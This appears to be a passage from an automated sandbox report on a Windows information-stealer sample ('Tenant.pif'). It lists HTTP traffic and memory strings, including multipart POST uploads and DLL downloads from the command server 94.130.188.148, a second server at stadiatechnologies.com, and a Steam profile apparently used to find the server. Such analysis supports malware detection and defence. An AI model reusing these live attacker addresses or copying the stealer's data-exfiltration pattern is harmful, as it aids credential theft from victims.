                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                        Host: 94.130.188.148
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        POST / HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----FBFIDBFHDBGIDHJJEGHI
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                        Host: 94.130.188.148
                        Content-Length: 1145
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        POST / HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----IDBGHDGHCGHCAAKFIIEC
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                        Host: 94.130.188.148
                        Content-Length: 331
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        POST / HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----HIIEBAFCBKFIDGCAKKKF
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                        Host: 94.130.188.148
                        Content-Length: 331
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        POST / HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----FBAAAKFCAFIIDHIDGHIE
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                        Host: 94.130.188.148
                        Content-Length: 331
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        POST / HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----AEBAFBGIDHCBFHIECFCB
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                        Host: 94.130.188.148
                        Content-Length: 457
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        POST / HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----IDHIEBAAKJDHIECAAFHC
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                        Host: 94.130.188.148
                        Content-Length: 114253
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        POST / HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----EBGDAAKJJDAAKFHJKJKF
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                        Host: 94.130.188.148
                        Content-Length: 331
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        POST / HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----KFCAFIIDHIDGHIECGDGI
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                        Host: stadiatechnologies.com
                        Content-Length: 3205
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: unknown | TCP traffic detected without corresponding DNS query: 94.130.188.148
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif | Code function: 11_2_00B129BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,11_2_00B129BA
                    Source: global traffic | HTTP traffic detected:
                        GET /profiles/76561199761128941 HTTP/1.1
                        Host: steamcommunity.com
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        GET / HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                        Host: 94.130.188.148
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        GET /sqlr.dll HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                        Host: 94.130.188.148
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        GET /freebl3.dll HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                        Host: 94.130.188.148
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        GET /mozglue.dll HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                        Host: 94.130.188.148
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        GET /msvcp140.dll HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                        Host: 94.130.188.148
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        GET /softokn3.dll HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                        Host: 94.130.188.148
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        GET /vcruntime140.dll HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                        Host: 94.130.188.148
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        GET /nss3.dll HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                        Host: 94.130.188.148
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global traffic | DNS traffic detected: DNS query: gCmUfnfZJOKMjo.gCmUfnfZJOKMjo
                    Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
                    Source: global traffic | DNS traffic detected: DNS query: stadiatechnologies.com
                    Source: unknown | HTTP traffic detected:
                        POST / HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----AAKEGIJEHJDGDHJKJKKJ
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                        Host: 94.130.188.148
                        Content-Length: 254
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: Tenant.pif, 0000000B.00000003.3255137862.0000000004522000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3255083848.0000000001790000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000151000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3254895213.0000000001511000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4072894428.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074431990.0000000001764000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3254796660.00000000015AE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074431990.000000000178F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://64532127VdtSrezylanAPHTGetSystemInfoGetSystemTimeSleepkernel32.dllSymMatchStringInternetSetOp
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000182000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://94.130.188.14887631f194nt-Disposition:
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4080885792.00000000134A2000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4080885792.00000000134A2000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4080885792.00000000134A2000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4080885792.00000000134A2000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4080885792.00000000134A2000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: file.exe, 00000000.00000003.2009804495.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif.2.dr, Neo.0.dr | String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
                    Source: file.exe, 00000000.00000003.2009804495.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif.2.dr, Neo.0.dr | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                    Source: file.exe, 00000000.00000003.2009804495.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif.2.dr, Neo.0.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                    Source: file.exe, 00000000.00000003.2009804495.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif.2.dr, Neo.0.dr | String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4080885792.00000000134A2000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4080885792.00000000134A2000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4080885792.00000000134A2000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4080885792.00000000134A2000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4080885792.00000000134A2000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4080885792.00000000134A2000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4080885792.00000000134A2000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4080885792.00000000134A2000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4080885792.00000000134A2000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                    Source: file.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4080885792.00000000134A2000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://ocsp.digicert.com0
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4080885792.00000000134A2000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://ocsp.digicert.com0A
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4080885792.00000000134A2000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://ocsp.digicert.com0C
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4080885792.00000000134A2000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://ocsp.digicert.com0N
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4080885792.00000000134A2000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://ocsp.digicert.com0X
                    Source: file.exe, 00000000.00000003.2009804495.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif.2.dr, Neo.0.dr | String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                    Source: file.exe, 00000000.00000003.2009804495.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif.2.dr, Neo.0.dr | String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
                    Source: file.exe, 00000000.00000003.2009804495.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif.2.dr, Neo.0.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
                    Source: file.exe, 00000000.00000003.2009804495.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif.2.dr, Neo.0.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                    Source: file.exe, 00000000.00000003.2009804495.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif.2.dr, Neo.0.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://stadia.188.148HIE
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://stadiatechnologies.0;
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://stadiatechnologies.1f19464;
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://stadiatechnologies.alntent-Disposition:
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://stadiatechnologies.com
                    Source: Tenant.pif, 0000000B.00000002.4072894428.0000000001394000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://stadiatechnologies.com/
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://stadiatechnologies.com/J
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://stadiatechnologies.comWin64;
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://stadiatechnologies.comntent-Disposition:
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.dr | String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.dr | String found in binary or memory: http://store.steampowered.com/privacy_agreement/
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.dr | String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                    Source: Amcache.hve.17.dr | String found in binary or memory: http://upx.sf.net
                    Source: file.exe, 00000000.00000003.2009804495.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp, Tenant.pif.2.dr, Neo.0.dr | String found in binary or memory: http://www.autoitscript.com/autoit3/J
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4080885792.00000000134A2000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://www.digicert.com/CPS0
                    Source: Tenant.pif, 0000000B.00000002.4097408823.000000006C69D000.00000002.00000001.01000000.00000009.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.11.dr | String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                    Source: Tenant.pif, 0000000B.00000002.4078109784.000000000C927000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077975968.000000000C51D000.00000002.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.sqlite.org/copyright.html.
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.dr | String found in binary or memory: http://www.valvesoftware.com/legal.htm
                    Source: 76561199761128941[1].htm.11.dr | String found in binary or memory: https://94.130.188.148
                    Source: Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://94.130.188.148/
                    Source: Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://94.130.188.148/freebl3.dll
                    Source: Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://94.130.188.148/mozglue.dll
                    Source: Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://94.130.188.148/mozglue.dllq
                    Source: Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://94.130.188.148/msvcp140.dll
                    Source: Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://94.130.188.148/msvcp140.dllI
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://94.130.188.148/nss3.dll
                    Source: Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://94.130.188.148/nss3.dllKEBKJD-journal
                    Source: Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://94.130.188.148/softokn3.dll
                    Source: Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://94.130.188.148/softokn3.dlle
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000278000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://94.130.188.148/sqlr.dll
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://94.130.188.148/sqlr.dll1
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://94.130.188.148/vcruntime140.dll
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://94.130.188.148/vcruntime140.dllCz
                    Source: Tenant.pif, 0000000B.00000002.4068394882.00000000002BC000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://94.130.188.148DGI
                    Source: Tenant.pif, 0000000B.00000002.4068394882.00000000002BC000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://94.130.188.148JKF
                    Source: KEBKJD.11.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: 76561199761128941[1].htm.11.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                    Source: Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074033487.00000000015AD000.00000004.00000800.00020000.00000000.sdmp, CBFCBK.11.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                    Source: Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074033487.00000000015AD000.00000004.00000800.00020000.00000000.sdmp, CBFCBK.11.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
